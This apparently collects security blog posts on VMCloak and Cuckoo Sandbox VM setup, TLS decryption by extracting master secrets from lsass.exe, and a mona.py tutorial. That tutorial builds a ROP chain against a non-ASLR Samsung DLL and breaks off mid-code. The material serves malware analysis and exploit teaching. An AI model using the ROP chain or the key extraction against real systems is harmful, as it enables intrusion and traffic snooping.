Revamped VMCloak 0.3

VMCloak 0.3: Totally revamped & Office support

[To quickly summarize - VMCloak is a tool for automatically creating, cloning,
and cloaking Virtual Machines to be used for Cuckoo Sandbox].

Earlier this year I released VMCloak 0.2. Now the time has come
for the next release, 0.3. Most notable about this release are the revamped
command-line usage, the improvements with regard to installing dependencies
in the Virtual Machine, and the newest supported dependency, Office 2007. Thanks to
LookingGlass Cyber Solutions for supporting the development towards
this release, including the Microsoft Office 2007 integration.

So what about it?

The new command-line interface feels a bit more hipster and less obtuse
than it used to. Most importantly, setting up a Virtual
Machine is no longer a one-shot action. Instead there are now a couple of
different subcommands, each fulfilling its own task.
In addition, the new VMCloak version uses the new
Cuckoo Agent, which is less Cuckoo-specific and more general
purpose, allowing easier communication between the VM and the various
VMCloak subcommands.

The subcommands.

As a few new commands are now available, it makes sense to elaborate on
them a little bit. So here goes. Note that all commands can be run either by
calling vmcloak-xyz or vmcloak xyz on the command-line.

vmcloak-init is the new command to initialize a new Virtual Machine. One
can specify a couple of flags, but the most important one is whether this is
going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7
whether it will be 32-bit or 64-bit (32-bit being the default).

So to get started we can run the following command to create a new 64-bit
Windows 7 VM. Note that this will be a VM internal to VMCloak; it cannot
be used right away in Cuckoo. For Windows XP setups a serial key is also
required; on Windows 7 a serial key is optional (by default a dummy key
provided by Microsoft is used). Also, just like before, you
still have to mount the Windows ISO file and set up vboxnet0.

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade
# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7
# Ensure the hostonly adapter is up.
vmcloak-vboxnet0
# Actually initialize the 64-bit Windows 7 VM.
vmcloak init --win7x64 seven0

Fast-forward 15 to 20 minutes: Windows has now been installed in your VM, the
VM has been shut down, and the VM has been removed from the VirtualBox
interface. All that remains is a VirtualBox harddisk file (.vdi file) in
~/.vmcloak/image and an entry about this new VM in VMCloak’s new sqlite3
database.

Moving forward it is time to install a couple of software packages in the VM.
Using vmcloak-install we will now install all of the currently supported
dependencies. The first parameter represents the name of our VM followed by
all the dependencies that should be installed.

vmcloak install seven0 adobe9 wic pillow dotnet40 java7

Now, to install Office 2007, assuming you have a valid ISO and serial key, one
can do so as follows. The ISO path and serial key have to be
provided as options to the dependency.

vmcloak install seven0 office2007 \
    office2007.isopath=/path/to/a.iso \
    office2007.serialkey=ABC-DEF
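The dep.key=value convention above can be illustrated with a small parser. This is a hypothetical sketch (parse_install_args is a made-up name, not VMCloak's actual implementation), assuming the VM name has already been taken off the front of the argument list:

```python
def parse_install_args(args):
    """Split hypothetical 'vmcloak install' arguments into dependencies and options.

    Plain words are dependency names; 'dep.key=value' attaches an option to dep.
    Illustration of the command-line convention only, not VMCloak's code.
    """
    dependencies = []
    options = {}
    for arg in args:
        if "=" in arg and "." in arg.split("=", 1)[0]:
            key, value = arg.split("=", 1)       # split on the first '=' only
            dep, option = key.split(".", 1)      # 'office2007.isopath' -> dep, option
            options.setdefault(dep, {})[option] = value
        else:
            dependencies.append(arg)
    return dependencies, options


deps, opts = parse_install_args([
    "office2007",
    "office2007.isopath=/path/to/a.iso",
    "office2007.serialkey=ABC-DEF",
])
print(deps)  # ['office2007']
print(opts)  # {'office2007': {'isopath': '/path/to/a.iso', 'serialkey': 'ABC-DEF'}}
```

Splitting only the part before the first = on the dot keeps values such as ISO paths (which contain dots themselves) intact.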

If required, one can now also easily make manual changes to VMCloak VMs. By
calling vmcloak-modify with the VM name as the only parameter it is possible
to change everything to your liking; simply shutting the VM down from
within Windows makes the changes persistent. If you are running VMCloak
locally then the --vm-visible argument makes sense. For remote interaction
with the VM you should enable VRDE support on the VM and connect to it (e.g.,
through rdesktop -KPz ip:3389).

Finally there is the vmcloak-snapshot command, which makes a snapshot of
your VM. There are a couple of options available for this command, but usage
mostly comes down to providing the name of the VMCloak VM, the name of the
resulting VM as it will be used by Cuckoo, and the static IP address to assign.

vmcloak snapshot seven0 cuckoo1 192.168.56.101

It is important to understand that after creating a snapshot of a VMCloak VM,
as one does by running the vmcloak-snapshot command on it, the VMCloak VM
becomes immutable. That is, you will no longer be able to run
vmcloak-install or vmcloak-modify on it. The reasoning behind this is to
save on valuable resources. Filling your harddisk is quite easy when you have
twenty Windows 7 VMs which each take up to 10GB.

If one decides he or she would like to update a VMCloak VM that is of course
still possible. For now the only way down that road is by cloning that
particular VMCloak VM. In the following example we clone seven0 to
seven0p1 (or, seven0 with one patch applied).

vmcloak clone seven0 seven0p1

I hope to have shed some light on the latest release. Going at it one step at
a time, life has just gotten slightly easier again.

Transparent MITM with Cuckoo Sandbox


In a series of upcoming blogposts I will be sharing a fair amount of cool
features that have been worked on over the past year in Cuckoo Sandbox. This
first blogpost features Man in the Middle support for Cuckoo Sandbox.

(Those who are familiar with Cuckoo Sandbox and the general ideas behind MITM
can scroll down to the slightly more exciting stuff in the Transparent
snooping of HTTPS traffic section.)

So, man in the middle?

As many will be aware, MITM is generally used to describe the process of
snooping on otherwise encrypted information, in this case network traffic. In
this blogpost we will dive into two different ways of doing MITM:

  • Providing a CA Root Certificate to allow a MITM proxy to intercept traffic.
  • Transparent dumping of TLS Master Secrets to decrypt TLS traffic.

Eh, Cuckoo Sandbox?

Before we continue with the MITM stuff, first a reminder on Cuckoo Sandbox. As
some of you will be aware, Cuckoo Sandbox is an Open Source
Automated Malware Analysis Sandbox. Analyses are performed by starting a VM
(Virtual Machine), running the potentially malicious sample, or URL as we
will be exploring in this blogpost, inside the VM, and stopping the VM once
the analysis is done.

Due to a personal interest, and that of some of my clients, Cuckoo has been
getting much, much better at analyzing Internet Explorer and the like in the
past few months. This is partly due to improvements in the actual analysis and
partly due to developments outside of the analysis itself, as will be outlined
in this blogpost. (For part of the improvements on the analysis side I would
like to thank Brad Spengler for continuously providing feedback and bug fixes.)

At work with mitmproxy

The first solution to provide MITM support to Cuckoo was to integrate a tool
called mitmproxy, created by Aldo Cortesi and maintained by fellow
The Honeynet Project member Maximilian Hils.

As outlined in its documentation, mitmproxy works by
installing a CA Root Certificate on the target device, in this case a
VM running either Windows XP or Windows 7.

After Googling around and looking at GUI dialogs to import certificates into
the Windows Certificate store, I finally managed to find an
easy command-line way to import a certificate (one that only works on
Windows 7, not Windows XP): invoking certutil.exe to import a .p12
certificate. This certificate can be found in ~/.mitmproxy after running
mitmproxy once (the first time mitmproxy is run on a system it automatically
creates a unique set of certificates).

At this point there are two ways to funnel traffic from the VM into
mitmproxy. For the time being I have taken the easy way, which
involves explicitly routing traffic through a socks4/5 proxy, but this
approach has obvious disadvantages:

  • This technique is not compatible with Certificate Pinning.
  • Looking at the PCAP file all traffic goes to the proxy.
  • Having to explicitly tunnel traffic through socks4/5 translates into this
    technique not working for anything but Internet Explorer (i.e., at this
    point no support has been provided for other applications).
  • Hostnames are not resolved in the VM. Did I mention all the traffic goes to
    the proxy?

A better approach would be to route VM traffic to the proxy by the use of a
tool such as redsocks (not to be confused with RedSocks, a
Dutch startup and one of my clients, providing the malware threat defender, a
network security appliance for detecting malware infections and other unwanted
software in your corporate network).
Anyway, a possible drawback of such a tool is that it has to be configured
through various commands that require root, something that is generally not
available to Cuckoo once it is running. I’ll have to look into this later.
(Also, this technique still requires the CA Root Certificate and thus it is
not compatible with Certificate Pinning.)

Transparent snooping of HTTPS traffic

Going a bit more in-depth with HTTPS and TLS, we learn
that in the TLS protocol the client and server each send a per-session
random value (the client random and the server random) which, combined with
the master secret, is used to derive the encryption keys, MAC keys, and IVs
(when needed), which in turn allow one to fully decrypt the TLS stream.
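To make the key derivation concrete, here is a minimal Python sketch of the TLS 1.0 PRF and the “key expansion” step as specified in RFC 2246. It is an illustration, not Cuckoo's code: the function names are my own, and it only covers TLS 1.0 (TLS 1.2 replaces the MD5/SHA-1 combination with a single hash). Note that the seed begins with the server random, which is what makes the server random visible in an instrumented PRF call.

```python
import hashlib
import hmac


def p_hash(digest, secret, seed, length):
    """P_hash from RFC 2246: HMAC(secret, A(i) + seed) for i = 1, 2, ..."""
    output = b""
    a = seed  # A(0) = seed
    while len(output) < length:
        a = hmac.new(secret, a, digest).digest()              # A(i) = HMAC(secret, A(i-1))
        output += hmac.new(secret, a + seed, digest).digest()
    return output[:length]


def tls10_prf(secret, label, seed, length):
    """TLS 1.0 PRF: P_MD5 over the first half of the secret XOR P_SHA-1 over the second."""
    half = (len(secret) + 1) // 2  # the halves share one byte if the length is odd
    s1, s2 = secret[:half], secret[-half:]
    md5_out = p_hash(hashlib.md5, s1, label + seed, length)
    sha1_out = p_hash(hashlib.sha1, s2, label + seed, length)
    return bytes(x ^ y for x, y in zip(md5_out, sha1_out))


def key_block(master_secret, server_random, client_random, length):
    """Key material for the MAC keys, encryption keys and (if needed) IVs.

    The seed is server_random + client_random, so a hooked "key expansion"
    PRF call exposes both the master secret and the server random.
    """
    return tls10_prf(master_secret, b"key expansion",
                     server_random + client_random, length)
```

The required length depends on the negotiated cipher suite. For example, TLS_RSA_WITH_RC4_128_SHA needs 72 bytes (two 20-byte MAC secrets and two 16-byte RC4 keys, no IVs): key_block(master_secret, server_random, client_random, 72).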

Reading further, we find an explanation by Brendan Dolan-Gavitt, the developer
of PANDA, of where and how to intercept the PRF function. We also find which
information is required to decrypt TLS streams in Wireshark.

Time to take a step back. We require the RSA Session ID, which, as defined
in the TLS protocol, can be extracted from the Server Hello record.
We also require the Master Secret, which, as we have seen, can
be extracted from the PRF function call. By instrumenting the PRF function
and looking for calls that feature the “key expansion” label (as defined in
RFC 2246), we can extract the master secret together with
the server random.
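Extracting the server random and session ID from a Server Hello record comes down to fixed offsets in the TLS record layout. A minimal sketch, assuming the record has already been pulled out of the TCP stream, that the ServerHello is the first handshake message in the record, and that it is not fragmented across records (parse_server_hello is a hypothetical helper):

```python
import struct

HANDSHAKE = 0x16      # TLS record content type: handshake
SERVER_HELLO = 0x02   # handshake message type: ServerHello


def parse_server_hello(record):
    """Return (server_random, session_id) from a TLS record starting with a ServerHello."""
    content_type, _version, length = struct.unpack(">BHH", record[:5])
    if content_type != HANDSHAKE:
        raise ValueError("not a handshake record")
    body = record[5:5 + length]
    if body[0] != SERVER_HELLO:
        raise ValueError("not a ServerHello message")
    offset = 4 + 2  # 4-byte handshake header, then the 2-byte server_version
    server_random = body[offset:offset + 32]
    offset += 32
    session_id_length = body[offset]  # 1-byte length prefix, 0..32
    session_id = body[offset + 1:offset + 1 + session_id_length]
    return server_random, session_id
```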

Long story short: we extract each pair of server random and master secret
from the PRF function in lsass.exe (Brendan outlined that all TLS
encryption is performed by the lsass.exe service on Windows, Windows 7 at
least), and we extract the Server Hello records from the PCAP file, which
link the Session IDs to the server randoms. We can then cross-reference this
information to write a Master Secret file with the matching RSA Session ID and
Master Secret for each TLS session that was negotiated during the analysis in
the VM. (Note that the server random is what ties the two together: we extract
it in both places, once from the Server Hello record and once from the PRF
“key expansion” function call.)
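The cross-referencing step can be sketched as a dictionary join on the server random. This is a hypothetical illustration: the input pairs are assumed to come from the Server Hello parsing and the lsass.exe PRF hook, and the output uses Wireshark's “RSA Session-ID:<hex> Master-Key:<hex>” key log line format; the exact layout of Cuckoo's tlsmaster.txt is not shown in this post.

```python
def master_secret_lines(server_hellos, prf_calls):
    """Cross-reference Server Hello data with PRF "key expansion" captures.

    server_hellos: (server_random, session_id) pairs taken from the PCAP.
    prf_calls: (server_random, master_secret) pairs captured in lsass.exe.
    Returns Wireshark-style "RSA Session-ID:... Master-Key:..." lines.
    """
    secret_by_random = dict(prf_calls)  # the server random is the join key
    lines = []
    seen = set()
    for server_random, session_id in server_hellos:
        master_secret = secret_by_random.get(server_random)
        if master_secret is None or not session_id:
            continue  # no matching PRF call, or no session ID to key on
        line = "RSA Session-ID:%s Master-Key:%s" % (session_id.hex(), master_secret.hex())
        if line not in seen:  # resumed sessions would otherwise produce duplicates
            seen.add(line)
            lines.append(line)
    return lines
```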

Fast-forward through various long nights of debugging code, many changes and
improvements to Cuckoo to facilitate all of this in the first place, and
matching the various pieces of extracted information to each other, and we
finally end up with functionality in Cuckoo to dump a tlsmaster.txt file for
each analysis.

To recap some facts about this transparent approach:

  • It does not require any special handling for the analyzed application,
    only for the instrumented lsass.exe service.
  • Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to perform
    the TLS/HTTPS encryption, including those of Windows Update, etc.
  • Since there is no need to proxy the traffic through some 3rd party tool, the
    PCAP file looks the same as it would without our transparent sniffer.
  • As the TLS connection itself is not tampered with, applications that use
    Certificate Pinning are supported.

Following is a screenshot showing Wireshark with a PCAP containing decrypted
HTTPS traffic of an analysis visiting the login page of the Dutch banking
website ING, using the latest Cuckoo Sandbox:

Wireshark vs ING

HTTP/HTTPS replay tool

Because I was not really able to find such code elsewhere, and because tshark
falls under the not invented here rule, I worked up a small Python project
that extracts HTTP and HTTPS streams from a PCAP file given the
corresponding TLS Master Secrets file. To be fair, integrating a tool such as
tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one of
the future goals is to include decrypted HTTPS traffic in the Cuckoo reports
without having to depend on tools like mitmproxy (due to their lack of
transparency).

The final goal of httpreplay will, as one might expect, be to transparently
replay HTTP/HTTPS traffic from a PCAP file. This last step has not been
implemented yet, though. Among other things, this can be used to reproduce
and unittest analyses of certain websites with Cuckoo Sandbox.

Quickly running the httpreplay tool on the same PCAP as shown earlier we find
the following output (just URLs of extracted HTTP/HTTPS streams):

$ python httpreplay.py dump.pcap tlsmaster.txt
http://mijn.ing.nl/
https://mijn.ing.nl/internetbankieren/
https://mijn.ing.nl/favicon.ico
...
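Producing the URLs above from reassembled streams is mostly a matter of reading the request line and the Host header. A rough sketch, not httpreplay's actual code (request_url is a hypothetical helper), assuming the HTTP request head has already been reassembled and, for HTTPS, decrypted with the master secrets:

```python
def request_url(request, is_tls):
    """Rebuild the URL of one reassembled (and, for HTTPS, decrypted) HTTP request.

    request: raw bytes of the request, starting with the request line.
    is_tls: True if the stream was TLS, which selects the https scheme.
    """
    head = request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    if target.startswith(("http://", "https://")):
        return target  # absolute-form target, e.g. a request sent to a proxy
    host = ""
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip()
            break
    scheme = "https" if is_tls else "http"
    return "%s://%s%s" % (scheme, host, target)
```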

Some readers may note this tool is very similar to a thousand others in its
field, one of which is CapTipper, developed by our friends at
CheckPoint. At the moment the only added value of httpreplay would be HTTPS
support (and perhaps proper TCP reassembly and the future goal of being able
to operate on multi-gigabyte files without loading them entirely into memory).

Conclusion

Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gained
some new tricks. I finally wrote another blogpost ;)

VMCloak 0.2: Windows 7 Support


A couple of months ago I released the first version of
VMCloak, now it’s time for version 0.2. VMCloak is a tool for
automatically creating and configuring Virtual Machines for
Cuckoo Sandbox.

What’s new?

In this version of VMCloak we introduce the long-awaited Windows 7
support. This means VMCloak can now automatically create and configure
Windows 7 virtual machines for Cuckoo Sandbox.

Usage

Those who have used VMCloak in the past will see that creating Windows 7
virtual machines is now just as easy as creating Windows XP virtual machines.
Creating a Windows 7 virtual machine goes as follows:

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade
# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7
# Ensure VirtualBox' hostonly adapter is up.
vmcloak-vboxnet0
# Create a 64-bit Win7 VM with the name win7vm.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm

Besides a couple of internal changes, the only thing that changed for Windows
XP support is that you’ll now have to specify --winxp when creating a
Windows XP virtual machine, for example:

vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE

32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit
and 64-bit Windows 7 installations. This mostly means that VMCloak will
install a 64-bit version of the .NET framework, the 64-bit version of the
Microsoft C Runtime, etc.
For this to work, however, you’ll have to inform VMCloak that the 64-bit
libraries should be used instead of the 32-bit ones. This can either be
achieved by passing the --x64 flag to vmcloak, or by combining the
--win7 and --x64 flags straight into the --win7x64 flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support
64-bit analysis!)

VMCloak Birds

Those who want to deploy multiple virtual machines in a relatively short
time window while preserving as many resources as possible might like
VMCloak’s bird feature.
VirtualBox has immutable disks, disks that are created once and then never
changed; any changes on top of the immutable disk are then written to a new
VirtualBox disk. VMCloak uses this to create a bird image - a fully
installed and configured Windows installation. Creating a Virtual Machine
ready to be used by Cuckoo Sandbox out of this bird image then consists of a
couple of steps:

  • Create a new Virtual Machine.
  • Attach the immutable bird image.
  • Boot into Windows.
  • Configure a unique static IP address for this VM.
  • Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by vmcloak-clone.

Bird images are crucial when running a Cuckoo Sandbox instance with more
than a handful of VMs on one machine. Whereas creating a new VM with Windows 7
installed, such as a bird image, takes about 15 minutes and almost
10GB of disk space, creating a clone of a bird image takes less than a minute
and less than 1GB per clone.
Note that you’ll still need the bird image, even after cloning! (Basically,
instead of installing Windows 7 10 times for 10 VMs, the bird image allows you
to install Windows 7 once and then re-use this installation.)
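The disk space argument as back-of-the-envelope arithmetic, using the approximate figures above (about 10GB per full Windows 7 install, under 1GB per clone) as upper bounds; the function is only an illustration:

```python
def disk_usage_gb(vm_count, install_gb=10.0, clone_gb=1.0):
    """Rough upper-bound disk usage (GB) without and with a bird image."""
    without_bird = vm_count * install_gb          # one full Windows install per VM
    with_bird = install_gb + vm_count * clone_gb  # one bird plus a small diff disk per VM
    return without_bird, with_bird


print(disk_usage_gb(10))  # (100.0, 20.0)
```

So for 10 VMs the bird approach needs at most roughly a fifth of the disk space, and the gap widens as the number of VMs grows.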

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running
these commands should take up to half an hour to finish - just enough to go
for lunch.

# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird
# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i
done

What’s next?

As always further cloaking the VMs is on the roadmap. If anyone has tricks &
tips on known detection vectors that would be useful for VMCloak, please do
let me know. E.g., registry keys containing known values specific to
virtualization software, etc.

Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandbox
for a while now, so there’s that ;) And a bunch of other new and upcoming
features in Cuckoo.

Contact

For any questions or suggestions, please feel free to
reach out to me.

VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox


Today I present to you a tool that I’ve been working on for a while,
vmcloak. Those of you familiar with Cuckoo Sandbox
and setting it up will surely be aware of the pain that is configuring
virtual machines.

VMCloak 101

Somewhat complete documentation can be found at readthedocs.org;
however, a quick introduction of the related commands is of course the
easiest. (Do note that VMCloak has mostly been tested on Ubuntu/Debian, so
other distributions might not work yet.)

Basically you need a few things to get started:

  • vmcloak (sudo pip install vmcloak)
  • Windows XP Installer ISO file
  • Windows XP Serial Key (that works with your installer!)
  • genisoimage & VirtualBox (sudo apt-get install genisoimage virtualbox)
  • Two directories for VirtualBox files.

First we have to mount the Windows installer ISO file:

sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp

Now we have to start vboxnet0 if it has not already been started:

# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs
# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1

And then two directories are required - a directory where VirtualBox’ snapshot
files will be stored, and a directory where the VirtualBox harddisk files and
installer ISO files will be stored. Note that you might want to place the
snapshot files in a tmpfs container to ensure VMs load pretty much
instantly.

mkdir ~/vms/ ~/vm-data/

Having set up the mount directory, the hostonly interface, and the VirtualBox
directories, we’re now good to go with regard to creating our first VM with
VMCloak. It is advisable to use the recommended settings by providing
the -r switch. By default the hostonly IP address will be set to
192.168.56.101; however, if you intend to create multiple VMs then you’ll have
to give each VM a unique IP address (e.g., 192.168.56.102, 192.168.56.103,
etc.). In order to automatically register the newly created VM with Cuckoo
you’ll have to set the Cuckoo directory, so we’ll do this as well.
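Handing out unique consecutive addresses for several VMs is easy to script. A hedged sketch using Python's ipaddress module, assuming the default 192.168.56.0/24 vboxnet0 network and starting at 192.168.56.101; hostonly_ips is a hypothetical helper, and each pair would then be passed to vmcloak via --hostonly-ip:

```python
import ipaddress


def hostonly_ips(vm_names, first="192.168.56.101", network="192.168.56.0/24"):
    """Give each VM a unique, consecutive hostonly address inside the vboxnet0 subnet."""
    net = ipaddress.ip_network(network)
    start = ipaddress.ip_address(first)
    assignment = {}
    for offset, name in enumerate(vm_names):
        ip = start + offset
        if ip not in net or ip == net.broadcast_address:
            raise ValueError("ran out of addresses in %s" % network)
        assignment[name] = str(ip)
    return assignment


for name, ip in hostonly_ips(["cuckoo1", "cuckoo2", "cuckoo3"]).items():
    print(name, ip)  # e.g. vmcloak -r ... --hostonly-ip <ip> ... <name>
```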

We’re now going to make a VM with the name cuckoo1 and the IP address
192.168.56.101:

vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \
    cuckoo1

The -d switch causes vmcloak to spit out debugging messages, which may be
helpful in some cases. This command can take up to 30 minutes to finish;
on the machines I’ve tested it usually takes roughly 10 minutes or less.

So.. get yourself something to drink, wait for a bit, and you should have a
VM ready to be used by Cuckoo.

Allowing VMs full internet access

It is possible to give VMs full internet access, even after
creating them, without modifying the VMs themselves. If your network
configuration is “regular” (i.e., a working internet connection at either
eth0 or wlan0) then you’ll only have to run one command:

sudo vmcloak-iptables

TODO

Of course this is a never-ending project and it’s still actively being
developed ;) Things on the TODO list include, but are not limited to:

  • Windows 7 support
  • Further VM cloaking (making the VM as stealthy as possible)
  • VMware Workstation support
  • Support for installing Adobe / Microsoft Office / etc in the VM
  • Loads more..

Source

Of course there’s an official website and naturally the source code
can be found on github.

Credits

Further credits go to Thorsten Sick of Avira and a special thanks to
Avira and the iTES Project for supporting the development of
this tool.

So much for today! Hope the tool will be useful for people and if there are
any questions don’t hesitate to email me or so.

ps: Please don’t tell me about using vagrant or similar instead of
something custom built unless you’ve actually used it together with Cuckoo :P

Mona 101: a Global Samsung DLL


This blogpost will be just another 101 for mona.py. There’s already a
good introduction to / full documentation of mona here, including
setting it up and running it for the first time. (Which is surprisingly easy,
at least with Immunity Debugger - I haven’t tested mona with WinDBG.)

Our target

Well, it turns out that a dll called WinCRT.dll, developed by Samsung and
distributed by default on at least a set of Samsung laptops, is
being loaded in every process that imports user32.dll on my system.. Yay!
Needless to say it doesn’t have ASLR enabled, nor does it rebase by default.
If you haven’t guessed its base address by now, then I’ll give you a hint:
0x10000000. A copy of the DLL can be found here - naturally I’m not
responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is:
C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll

Generate some ROP

After running any program which imports user32, such as the following
MessageBox() program, we attach Immunity Debugger to it.

#include <windows.h>
int main()
{
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
}

We run the following command and get our ROP chain after roughly 10 seconds:

!mona rop -m wincrt -rva

As documented in the tutorials that were linked earlier in this blogpost, the
-m switch specifies the module to search, and -rva gives a dump with
addresses relative to the base address. (This is useful in case you need an
infoleak to obtain the base address of your target module, rather than having
a DLL that’s being loaded at a static address.)

The ROP chain returned may look like the following, including some comments
about what the registers should look like at the point that VirtualAlloc is
invoked.

"""
Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
"""
import struct

def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # & jmp esp (placeholder: mona found no such gadget in WinCRT.dll)
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    ]
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)
# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)

Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that’s why it gives great
feedback in the form of rop.txt and rop_suggestions.txt.

Now if you look closely at the generated ROP chain while comparing it to
the notes about the required states of the registers for VirtualAlloc, then
you’ll notice that some gadgets have to be shuffled around, and some are not
correct yet.

Let’s analyze each register top-to-bottom from the provided register list in
order to see if they’re all set correctly. First we start with eax.

Eax is set to 0x90909090 at the end. However, the gadget that does so
(“pop eax ; pop ebp ; retn”) also sets ebp to an invalid value; register
dependencies are something that mona doesn’t handle very well yet,
unfortunately. Anyway, it’s easier to replace this gadget than to shuffle it
around. I ended up replacing it with a “pop ecx ; retn” and a
“mov eax, ecx ; retn” gadget, and moving them to an earlier place in the ROP
chain where ecx has not yet been assigned its final value. Ecx itself is
already correct; it’ll be set to 0x40 using the ‘original’ “pop ecx ; retn”
gadget.

Edx has to become 0x1000, for which mona has decided to use ebx as
intermediate register. We can remove the first gadget that sets ebx, as its
value is overwritten right away when executing the next gadget. (Which sets
ebx as well.)

Now mona handles esp for us, so we don’t have to do anything there. The next
register, ebp, however, does need some extra work. The description tells us
it needs to point to a “jmp esp” gadget, but because there’s no such gadget in
our DLL mona sort of failed silently. (The comment doesn’t show an error
message, but instead shows something that doesn’t make much sense.)

Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,
we have to play around with mona some more. We run the following command,
which is, again, documented here, and find the following gadget.

!mona findwild -s "push esp#*#retn" -m wincrt
0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]
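Conceptually, findwild compares each candidate gadget instruction by instruction, with * standing in for any run of instructions. The following is a hypothetical sketch of that matching logic (wild_match is not part of mona, and mona's actual matching rules may differ, e.g. for retn with an operand):

```python
def wild_match(pattern, gadget):
    """Check a '#'-separated gadget against a findwild-style pattern.

    '*' matches any number of instructions (including none); every other
    pattern entry must equal one instruction (case and spacing ignored).
    """
    def split(text):
        return [" ".join(part.lower().split()) for part in text.split("#")]

    def match(pats, instrs):
        if not pats:
            return not instrs
        if pats[0] == "*":
            # Try letting the wildcard swallow 0, 1, 2, ... instructions.
            return any(match(pats[1:], instrs[i:]) for i in range(len(instrs) + 1))
        return bool(instrs) and instrs[0] == pats[0] and match(pats[1:], instrs[1:])

    return match(split(pattern), split(gadget))


print(wild_match("push esp#*#retn",
                 "push esp # add al,2 # adc bl,al # xor eax,eax # retn"))  # True
```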

Finishing up

So yeah, that’ll do for us :) Patch the 0x00000000 value with
“base_wincrt + 0x00009558” and ebp is good to go. Finally, esi and edi
have been handled correctly by mona. (Note that we don’t have to worry about
the value of eax in our custom “jmp esp” gadget, as this is executed right
after the call to VirtualAlloc, and literally jumps to our shellcode.)
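The patch itself is a one-value change in the gadget list. A minimal sketch, assuming the chain contains exactly one 0x00000000 placeholder (as in the mona output above); patch_jmp_esp is a hypothetical helper and the list below is only an excerpt of the full chain:

```python
JMP_ESP_RVA = 0x00009558  # "push esp # ... # retn" gadget found with findwild


def patch_jmp_esp(rop_gadgets, base, placeholder=0x00000000):
    """Return a copy of the chain with the single placeholder dword replaced."""
    if rop_gadgets.count(placeholder) != 1:
        raise ValueError("expected exactly one placeholder in the chain")
    patched = list(rop_gadgets)
    patched[patched.index(placeholder)] = base + JMP_ESP_RVA
    return patched


base_wincrt = 0x10000000
# Excerpt: POP EBP # RETN, the placeholder that ends up in ebp, POP EBX # RETN
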